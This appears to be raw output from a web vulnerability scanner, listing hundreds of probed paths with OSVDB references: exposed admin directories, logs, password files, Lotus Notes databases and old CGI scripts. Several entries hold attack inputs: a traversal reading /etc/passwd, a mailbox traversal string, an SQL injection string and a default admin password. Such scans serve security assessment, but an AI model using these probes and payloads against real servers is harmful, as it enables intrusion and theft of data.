+ OSVDB-4808: /axis-cgi/buffer/command.cgi: Axis WebCam 2400 may allow overwriting or creating files on the system. See http://www.websec.org/adv/axis2400.txt.html for details.
+ OSVDB-4806: /support/messages: Axis WebCam allows retrieval of messages file (/var/log/messages). See http://www.websec.org/adv/axis2400.txt.html
+ OSVDB-12184: /some.php?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /some.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /some.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-228: /upload.cgi+: The upload.cgi allows attackers to upload arbitrary files to the server.
+ OSVDB-561: /server-status: This reveals Apache information. Comment out appropriate line in httpd.conf or restrict access to allowed hosts.
+ OSVDB-1264: /publisher/: Netscape Enterprise Server with Web Publishing can allow attackers to edit web pages and/or list arbitrary directories via Java applet. CVE-2000-0237.
+ OSVDB-134: /cgi-bin/pfdisplay.cgi?../../../../../../etc/passwd: Comes with IRIX 6.2-6.4; allows to run arbitrary commands
+ OSVDB-2: /iissamples/exair/search/search.asp: Scripts within the Exair package on IIS 4 can be used for a DoS against the server. CVE-1999-0449. BID-193.
+ OSVDB-2117: /cpanel/: Web-based control panel
+ OSVDB-2119: /shopping/diag_dbtest.asp: VP-ASP Shopping Cart 5.0 contains multiple SQL injection vulnerabilities. CVE-2003-0560, http://www.securityfocus.com/bid/8159
+ OSVDB-2695: /photo/: My Photo Gallery pre 3.6 contains multiple vulnerabilities including directory traversal, unspecified vulnerabilities and remote management interface access.
+ OSVDB-2695: /photodata/: My Photo Gallery pre 3.6 contains multiple vulnerabilities including directory traversal, unspecified vulnerabilities and remote management interface access.
+ OSVDB-272: /msadc/msadcs.dll: See RDS advisory RFP9902, CVE-1999-1011, http://www.microsoft.com/technet/security/bulletin/MS98-004.asp, http://www.microsoft.com/technet/security/bulletin/MS99-025.asp RFP-9902 BID-29 (http://www.wiretrip.net/rfp/p/doc.asp/i2/d1.htm), CIAC J-054 http://www.ciac.org/ciac/bulletins/j-054.shtml www.securityfocus.com/bid/529
+ OSVDB-2735: /musicqueue.cgi: Musicqueue 1.20 is vulnerable to a buffer overflow. Ensure the latest version is installed (exploit not attempted). http://musicqueue.sourceforge.net/
+ OSVDB-2813: /admin/database/wwForum.mdb: Web Wiz Forums pre 7.5 is vulnerable to Cross-Site Scripting attacks. Default login/pass is Administrator/letmein
+ OSVDB-284: /iisadmpwd/aexp2.htr: Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. CVE-1999-0407. http://www.securityfocus.com/bid/4236. http://www.securityfocus.com/bid/2110.
+ OSVDB-284: /iisadmpwd/aexp2b.htr: Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. CVE-1999-0407. http://www.securityfocus.com/bid/4236. http://www.securityfocus.com/bid/2110.
+ OSVDB-284: /iisadmpwd/aexp3.htr: Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. CVE-1999-0407. http://www.securityfocus.com/bid/4236. http://www.securityfocus.com/bid/2110.
+ OSVDB-284: /iisadmpwd/aexp4.htr: Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. CVE-1999-0407. http://www.securityfocus.com/bid/4236. http://www.securityfocus.com/bid/2110.
+ OSVDB-284: /iisadmpwd/aexp4b.htr: Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. CVE-1999-0407. http://www.securityfocus.com/bid/4236. http://www.securityfocus.com/bid/2110.
+ OSVDB-2842: //admin/aindex.htm: FlexWATCH firmware 2.2 is vulnerable to authentication bypass by prepending an extra '/'. http://packetstorm.linuxsecurity.com/0310-exploits/FlexWATCH.txt
+ OSVDB-2922: /admin/wg_user-info.ml: WebGate Web Eye exposes user names and passwords.
+ OSVDB-294: /c32web.exe/ChangeAdminPassword: This CGI may contain a backdoor and may allow attackers to change the Cart32 admin password.
+ OSVDB-2944: /showmail.pl: @Mail WebMail 3.52 allows attacker to read arbitrary user's mailbox. Requires knowing valid user name and appending ?Folder=../../[email protected]/mbox/Inbox to the showmail.pl file.
+ OSVDB-2948: /reademail.pl: @Mail WebMail 3.52 contains an SQL injection that allows attacker to read any email message for any address registered in the system. Example to append to reademail.pl: ?id=666&folder=qwer'%20or%20EmailDatabase_v.Account='[email protected]&print=1
+ OSVDB-3: /iissamples/exair/search/query.asp: Scripts within the Exair package on IIS 4 can be used for a DoS against the server. CVE-1999-0449. BID-193.
+ OSVDB-3092: /buddies.blt: Buddy List?
+ OSVDB-3092: /buddy.blt: Buddy List?
+ OSVDB-3092: /buddylist.blt: Buddy List?
+ OSVDB-3092: /sqlnet.log: Oracle log file found.
+ OSVDB-3092: /.psql_history: This might be interesting...
+ OSVDB-3092: /acceso/: This might be interesting...
+ OSVDB-3092: /access-log: This might be interesting...
+ OSVDB-3092: /access.log: This might be interesting...
+ OSVDB-3092: /access/: This might be interesting...
+ OSVDB-3092: /access_log: This might be interesting...
+ OSVDB-3092: /acciones/: This might be interesting...
+ OSVDB-3092: /account/: This might be interesting...
+ OSVDB-3092: /accounting/: This might be interesting...
+ OSVDB-3092: /activex/: This might be interesting...
+ OSVDB-3092: /adm/: This might be interesting...
+ OSVDB-3092: /admin.htm: This might be interesting...
+ OSVDB-3092: /admin.html: This might be interesting...
+ OSVDB-3092: /admin.php: This might be interesting...
+ OSVDB-3092: /admin.php3: This might be interesting...
+ OSVDB-3092: /admin.shtml: This might be interesting...
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3092: /Administration/: This might be interesting...
+ OSVDB-3092: /administration/: This might be interesting...
+ OSVDB-3092: /administrator/: This might be interesting...
+ OSVDB-3092: /Admin_files/: This might be interesting...
+ OSVDB-3092: /advwebadmin/: This might be interesting...probably HostingController, www.hostingcontroller.com
+ OSVDB-3092: /Agent/: This might be interesting...
+ OSVDB-3092: /Agentes/: This might be interesting...
+ OSVDB-3092: /agentes/: This might be interesting...
+ OSVDB-3092: /Agents/: This might be interesting...
+ OSVDB-3092: /analog/: This might be interesting...
+ OSVDB-3092: /apache/: This might be interesting...
+ OSVDB-3092: /app/: This might be interesting...
+ OSVDB-3092: /applicattion/: This might be interesting...
+ OSVDB-3092: /applicattions/: This might be interesting...
+ OSVDB-3092: /apps/: This might be interesting...
+ OSVDB-3092: /archivar/: This might be interesting...
+ OSVDB-3092: /archive/: This might be interesting...
+ OSVDB-3092: /archives/: This might be interesting...
+ OSVDB-3092: /archivo/: This might be interesting...
+ OSVDB-3092: /asp/: This might be interesting...
+ OSVDB-3092: /Asp/: This might be interesting...
+ OSVDB-3092: /atc/: This might be interesting...
+ OSVDB-3092: /forum/: This might be interesting...
+ OSVDB-3092: /forums/: This might be interesting...
+ OSVDB-3092: /foto/: This might be interesting...
+ OSVDB-3092: /fotos/: This might be interesting...
+ OSVDB-3092: /fpadmin/: This might be interesting...
+ OSVDB-3092: /ftp/: This might be interesting...
+ OSVDB-3092: /gfx/: This might be interesting...
+ OSVDB-3092: /global/: This might be interesting...
+ OSVDB-3092: /graphics/: This might be interesting...
+ OSVDB-3092: /guest/: This might be interesting...
+ OSVDB-3092: /guestbook/: This might be interesting...
+ OSVDB-3092: /guests/: This might be interesting...
+ OSVDB-3092: /hidden/: This might be interesting...
+ OSVDB-3092: /hitmatic/: This might be interesting...
+ OSVDB-3092: /hitmatic/analyse.cgi: This might be interesting...
+ OSVDB-3092: /hit_tracker/: This might be interesting...
+ OSVDB-3092: /home/: This might be interesting...
+ OSVDB-3092: /homepage/: This might be interesting...
+ OSVDB-3092: /htdocs/: This might be interesting...
+ OSVDB-3092: /html/: This might be interesting...
+ OSVDB-3092: /htpasswd: This might be interesting...
+ OSVDB-3092: /HyperStat/stat_what.log: This might be interesting...
+ OSVDB-3092: /hyperstat/stat_what.log: This might be interesting...
+ OSVDB-3092: /ibill/: This might be interesting...
+ OSVDB-3092: /idea/: This might be interesting...
+ OSVDB-3092: /ideas/: This might be interesting...
+ OSVDB-3092: /imagenes/: This might be interesting...
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3092: /imgs/: This might be interesting...
+ OSVDB-3092: /import/: This might be interesting...
+ OSVDB-3092: /impreso/: This might be interesting...
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3092: /incoming/: This might be interesting...
+ OSVDB-3092: /info/: This might be interesting...
+ OSVDB-3092: /informacion/: This might be interesting...
+ OSVDB-3092: /information/: This might be interesting...
+ OSVDB-3092: /ingresa/: This might be interesting...
+ OSVDB-3092: /ingreso/: This might be interesting...
+ OSVDB-3092: /logger/: This might be interesting...
+ OSVDB-3092: /logging/: This might be interesting...
+ OSVDB-3092: /login/: This might be interesting...
+ OSVDB-3092: /logs/: This might be interesting...
+ OSVDB-3092: /logs/access_log: This might be interesting...
+ OSVDB-3092: /logs/error_log: This might be interesting...
+ OSVDB-3092: /lost+found/: This might be interesting...
+ OSVDB-3092: /mail/: This might be interesting...
+ OSVDB-3092: /manage/cgi/cgiproc: This might be interesting...
+ OSVDB-3092: /marketing/: This might be interesting...
+ OSVDB-3092: /master.password: This might be interesting...
+ OSVDB-3092: /mbox: This might be interesting...
+ OSVDB-3092: /members/: This might be interesting...
+ OSVDB-3092: /message/: This might be interesting...
+ OSVDB-3092: /messaging/: This might be interesting...
+ OSVDB-3092: /ministats/admin.cgi: This might be interesting...
+ OSVDB-3092: /misc/: This might be interesting...
+ OSVDB-3092: /mkstats/: This might be interesting...
+ OSVDB-3092: /movimientos/: This might be interesting...
+ OSVDB-3092: /mp3/: This might be interesting...
+ OSVDB-3092: /mqseries/: This might be interesting...
+ OSVDB-3092: /msql/: This might be interesting...
+ OSVDB-3092: /msword/: This might be interesting...
+ OSVDB-3092: /Msword/: This might be interesting...
+ OSVDB-3092: /MSword/: This might be interesting...
+ OSVDB-3092: /NetDynamic/: This might be interesting...
+ OSVDB-3092: /NetDynamics/: This might be interesting...
+ OSVDB-3092: /netscape/: This might be interesting...
+ OSVDB-3092: /new: This may be interesting...
+ OSVDB-3092: /new/: This might be interesting...
+ OSVDB-3092: /news: This might be interesting...
+ OSVDB-3092: /noticias/: This might be interesting...
+ OSVDB-3092: /odbc/: This might be interesting...
+ OSVDB-3092: /old/: This might be interesting...
+ OSVDB-3092: /oracle: This might be interesting...
+ OSVDB-3092: /oradata/: This might be interesting...
+ OSVDB-3092: /order/: This might be interesting...
+ OSVDB-3092: /orders/: This might be interesting...
+ OSVDB-3092: /orders/mountain.cfg: This might be interesting...
+ OSVDB-3092: /orders/orders.log: This might be interesting...
+ OSVDB-3092: /outgoing/: This might be interesting...
+ OSVDB-3092: /ows/: This might be interesting... Oracle Web Services?
+ OSVDB-3092: /pages/: This might be interesting...
+ OSVDB-3092: /Pages/: This might be interesting...
+ OSVDB-3092: /passwd: This could be interesting...
+ OSVDB-3092: /passwd.adjunct: This could be interesting...
+ OSVDB-3092: /passwdfile: This might be interesting...
+ OSVDB-3092: /password: This could be interesting...
+ OSVDB-3092: /passwords/: This might be interesting...
+ OSVDB-3092: /PDG_Cart/: This might be interesting...
+ OSVDB-3092: /people.list: This might be interesting...
+ OSVDB-3092: /perl5/: This might be interesting...
+ OSVDB-3092: /php/: This might be interesting...
+ OSVDB-3092: /phpMyAdmin/: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3092: /pics/: This might be interesting...
+ OSVDB-3092: /piranha/secure/passwd.php3: This might be interesting...
+ OSVDB-3092: /pix/: This might be interesting...
+ OSVDB-3092: /poll: This might be interesting...
+ OSVDB-3092: /polls: This might be interesting...
+ OSVDB-3092: /porn/: This might be interesting...
+ OSVDB-3092: /pr0n/: This might be interesting...
+ OSVDB-3092: /privado/: This might be interesting...
+ OSVDB-3092: /private/: This might be interesting...
+ OSVDB-3092: /prod/: This might be interesting...
+ OSVDB-3092: /pron/: This might be interesting...
+ OSVDB-3092: /prueba/: This might be interesting...
+ OSVDB-3092: /pruebas/: This might be interesting...
+ OSVDB-3092: /pub/: This might be interesting...
+ OSVDB-3092: /public/: This might be interesting...
+ OSVDB-3092: /publica/: This might be interesting...
+ OSVDB-3092: /publicar/: This might be interesting...
+ OSVDB-3092: /publico/: This might be interesting...
+ OSVDB-3092: /purchase/: This might be interesting...
+ OSVDB-3092: /purchases/: This might be interesting...
+ OSVDB-3092: /pwd.db: This might be interesting...
+ OSVDB-3092: /python/: This might be interesting...
+ OSVDB-3092: /readme: This might be interesting...
+ OSVDB-3092: /readme.txt: This might be interesting...
+ OSVDB-3092: /register/: This might be interesting...
+ OSVDB-3092: /registered/: This might be interesting...
+ OSVDB-3092: /reports/: This might be interesting...
+ OSVDB-3092: /reseller/: This might be interesting...
+ OSVDB-3092: /restricted/: This might be interesting...
+ OSVDB-3092: /retail/: This might be interesting...
+ OSVDB-3092: /reviews/newpro.cgi: This might be interesting...
+ OSVDB-3092: /sales/: This might be interesting...
+ OSVDB-3092: /sample/: This might be interesting...
+ OSVDB-3092: /samples/: This might be interesting...
+ OSVDB-3092: /save/: This might be interesting...
+ OSVDB-3092: /scr/: This might be interesting...
+ OSVDB-3092: /scratch: This might be interesting...
+ OSVDB-3092: /scripts/weblog: This might be interesting...
+ OSVDB-3092: /search.vts: This might be interesting...
+ OSVDB-3092: /search97.vts: This might be interesting...
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3092: /sell/: This might be interesting...
+ OSVDB-3092: /service/: This might be interesting...
+ OSVDB-3092: /servicio/: This might be interesting...
+ OSVDB-3092: /servicios/: This might be interesting...
+ OSVDB-3092: /setup/: This might be interesting...
+ OSVDB-3092: /shop/: This might be interesting...
+ OSVDB-3092: /shopper/: This might be interesting...
+ OSVDB-3092: /solaris/: This might be interesting...
+ OSVDB-3092: /Sources/: This might be interesting... may be YaBB.
+ OSVDB-3092: /spwd: This might be interesting...
+ OSVDB-3092: /srchadm: This might be interesting...
+ OSVDB-3092: /ss.cfg: This might be interesting...
+ OSVDB-3092: /staff/: This might be interesting...
+ OSVDB-3092: /stat.htm: This might be interesting...
+ OSVDB-3092: /stat/: This might be interesting...
+ OSVDB-3092: /statistic/: This might be interesting...
+ OSVDB-3092: /Statistics/: This might be interesting...
+ OSVDB-3092: /statistics/: This might be interesting...
+ OSVDB-3092: /stats.htm: This might be interesting...
+ OSVDB-3092: /stats.html: This might be interesting...
+ OSVDB-3092: /stats/: This might be interesting...
+ OSVDB-3092: /Stats/: This might be interesting...
+ OSVDB-3092: /status/: This might be interesting...
+ OSVDB-3092: /store/: This might be interesting...
+ OSVDB-3092: /StoreDB/: This might be interesting...
+ OSVDB-3092: /stylesheet/: This might be interesting...
+ OSVDB-3092: /stylesheets/: This might be interesting...
+ OSVDB-3092: /subir/: This might be interesting...
+ OSVDB-3092: /sun/: This might be interesting...
+ OSVDB-3092: /super_stats/access_logs: This might be interesting...
+ OSVDB-3092: /super_stats/error_logs: This might be interesting...
+ OSVDB-3092: /support/: This might be interesting...
+ OSVDB-3092: /swf: This might be interesting... Flash files?
+ OSVDB-3092: /sys/: This might be interesting...
+ OSVDB-3092: /system/: This might be interesting...
+ OSVDB-3092: /tar/: This might be interesting...
+ OSVDB-3092: /tarjetas/: This might be interesting...
+ OSVDB-3092: /temp/: This might be interesting...
+ OSVDB-3092: /template/: This may be interesting as the directory may hold sensitive files or reveal system information.
+ OSVDB-3092: /temporal/: This might be interesting...
+ OSVDB-3092: /test.htm: This might be interesting...
+ OSVDB-3092: /test.html: This might be interesting...
+ OSVDB-3092: /test/: This might be interesting...
+ OSVDB-3092: /testing/: This might be interesting...
+ OSVDB-3092: /tests/: This might be interesting...
+ OSVDB-3092: /tmp/: This might be interesting...
+ OSVDB-3092: /tools/: This might be interesting...
+ OSVDB-3092: /tpv/: This might be interesting...
+ OSVDB-3092: /trabajo/: This might be interesting...
+ OSVDB-3092: /trafficlog/: This might be interesting...
+ OSVDB-3092: /transito/: This might be interesting...
+ OSVDB-3092: /tree/: This might be interesting...
+ OSVDB-3092: /trees/: This might be interesting...
+ OSVDB-3092: /updates/: This might be interesting...
+ OSVDB-3092: /user/: This might be interesting...
+ OSVDB-3092: /users/: This might be interesting...
+ OSVDB-3092: /users/scripts/submit.cgi: This might be interesting...
+ OSVDB-3092: /ustats/: This might be interesting...
+ OSVDB-3092: /usuario/: This might be interesting...
+ OSVDB-3092: /usuarios/: This might be interesting...
+ OSVDB-3092: /vfs/: This might be interesting...
+ OSVDB-3092: /w3perl/admin: This might be interesting...
+ OSVDB-3092: /warez/: This might be interesting...
+ OSVDB-3092: /web/: This might be interesting...
+ OSVDB-3092: /web800fo/: This might be interesting...
+ OSVDB-3092: /webaccess.htm: This might be interesting...
+ OSVDB-3092: /webadmin/: This might be interesting...may be HostingController, www.hostingcontroller.com
+ OSVDB-3092: /webboard/: This might be interesting...
+ OSVDB-3092: /webcart-lite/: This might be interesting...
+ OSVDB-3092: /webcart/: This might be interesting...
+ OSVDB-3092: /webdata/: This might be interesting...
+ OSVDB-3092: /weblog/: This might be interesting...
+ OSVDB-3092: /weblogs/: This might be interesting...
+ OSVDB-3092: /webmaster_logs/: This might be interesting...
+ OSVDB-3092: /WebShop/: This might be interesting...
+ OSVDB-3092: /website/: This might be interesting...
+ OSVDB-3092: /webstats/: This might be interesting...
+ OSVDB-3092: /WebTrend/: This might be interesting...
+ OSVDB-3092: /Web_store/: This might be interesting...
+ OSVDB-3092: /windows/: This might be interesting...
+ OSVDB-3092: /word/: This might be interesting...
+ OSVDB-3092: /work/: This might be interesting...
+ OSVDB-3092: /wstats/: This might be interesting...
+ OSVDB-3092: /wusage/: This might be interesting...
+ OSVDB-3092: /www-sql/: This might be interesting...
+ OSVDB-3092: /www/: This might be interesting...
+ OSVDB-3092: /wwwboard/wwwboard.cgi: This might be interesting...
+ OSVDB-3092: /wwwboard/wwwboard.pl: This might be interesting...
+ OSVDB-3092: /wwwjoin/: This might be interesting...
+ OSVDB-3092: /wwwlog/: This might be interesting...
+ OSVDB-3092: /wwwstats.html: This might be interesting...
+ OSVDB-3092: /wwwstats/: This might be interesting...
+ OSVDB-3092: /wwwthreads/3tvars.pm: This might be interesting...
+ OSVDB-3092: /wwwthreads/w3tvars.pm: This might be interesting...
+ OSVDB-3092: /zipfiles/: This might be interesting...
+ OSVDB-13483: /adsamples/config/site.csc: Contains SQL username/password
+ OSVDB-3092: /advworks/equipment/catalog_type.asp: This might be interesting...
+ OSVDB-3092: /carbo.dll: This might be interesting...
+ OSVDB-17670: /clocktower/: Site Server sample files.  This might be interesting...
+ OSVDB-17670: /market/: Site Server sample files.  This might be interesting.
+ OSVDB-17670: /mspress30/: Site Server sample files.  This might be interesting...
+ OSVDB-3092: /sam: This might be interesting...
+ OSVDB-3092: /sam.bin: This might be interesting...
+ OSVDB-3092: /sam._: This might be interesting...
+ OSVDB-3092: /samples/search/queryhit.htm: This might be interesting...
+ OSVDB-17669: /scripts/cphost.dll: cphost.dll may have a DoS and a traversal issue.
+ OSVDB-3092: /scripts/postinfo.asp: This might be interesting...
+ OSVDB-3092: /scripts/samples/ctguestb.idc: This might be interesting...
+ OSVDB-3092: /site/iissamples/: This might be interesting...
+ OSVDB-17670: /vc30/: Site Server sample files.  This might be interesting...
+ OSVDB-3092: /_mem_bin/: This might be interesting - User Login
+ OSVDB-3092: /_mem_bin/FormsLogin.asp: This might be interesting - User Login
+ OSVDB-3092: /perl/files.pl: This might be interesting...
+ OSVDB-3092: /perl5/files.pl: This might be interesting...
+ OSVDB-3092: /scripts/convert.bas: This might be interesting...
+ OSVDB-3092: /owa_util%2esignature: Unknown, may be interesting
+ OSVDB-3233: /cgi-dos/args.bat: Default FrontPage CGI found.
+ OSVDB-3092: /custdata/: This may be COWS (CGI Online Worldweb Shopping), and may be interesting...
+ OSVDB-3092: /hostingcontroller/: This might be interesting...probably HostingController, www.hostingcontroller.com
+ OSVDB-3092: /data.sql: Database SQL?
+ OSVDB-3092: /databases/: Databases? Really??
+ OSVDB-3092: /databse.sql: Database SQL?
+ OSVDB-3092: /db.sql: Database SQL?
+ OSVDB-3092: /img-sys/: Default image directory should not allow directory listing.
+ OSVDB-3092: /java-sys/: Default Java directory should not allow directory listing.
+ OSVDB-3092: /javadoc/: Documentation...?
+ OSVDB-3092: /log/: Ahh...log information...fun!
+ OSVDB-3092: /manager/: May be a web server or site manager.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3092: /account.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /accounts.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /admin.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /admin4.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /admin5.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /agentrunner.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /alog.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /archive/a_domlog.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /archive/l_domlog.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /a_domlog.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /billing.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /bookmark.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /books.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /busytime.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /calendar.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /certa.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /certlog.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /certsrv.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /chatlog.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /clbusy.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /cldbdir.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /clusta4.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /collect4.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /cpa.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /customerdata.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /da.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /database.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /db.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /dclf.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /DEASAppDesign.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /DEASLog.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /DEASLog01.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /DEASLog02.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /DEASLog03.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /DEASLog04.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /DEASLog05.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /decsadm.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /decsdoc.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /decslog.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /DEESAdmin.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /default.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /dirassist.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /doladmin.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /dols_help.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /domadmin.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /domcfg.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /event.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /events.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /events5.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /group.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /groups.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /help5_admin.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /help5_client.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /help5_designer.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /homepage.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /iNotes/Forms5.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /iNotes/Forms5.nsf/$DefaultNav: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /jotter.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /kbccv11.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /kbnv11.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /kbssvv11.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /lcon.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /ldap.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /leiadm.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /leilog.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /leivlt.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /mail/adminisist.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /mail1.box: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /mail10.box: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /mail2.box: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /mail3.box: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /mail4.box: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /mail5.box: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /mail6.box: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /mail7.box: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /mail8.box: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /mail9.box: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /mailw46.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /msdwda.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /mtatbls.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /mtdata/mtstore.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /mtstore.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /nntp/nd000000.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /nntp/nd000001.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /nntp/nd000002.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /nntp/nd000003.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /nntp/nd000004.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /nntppost.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /notes.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /ntsync4.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /ntsync45.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /perweb.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /private.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /public.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /qpadmin.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /quickplace/quickplace/main.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /quickstart/qstart50.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /quickstart/wwsample.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /readme.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /reports.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /sample/faqw46: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /sample/framew46: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /sample/pagesw46: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /sample/siregw46: This database can be read without authentication, which may reveal sensitive information.
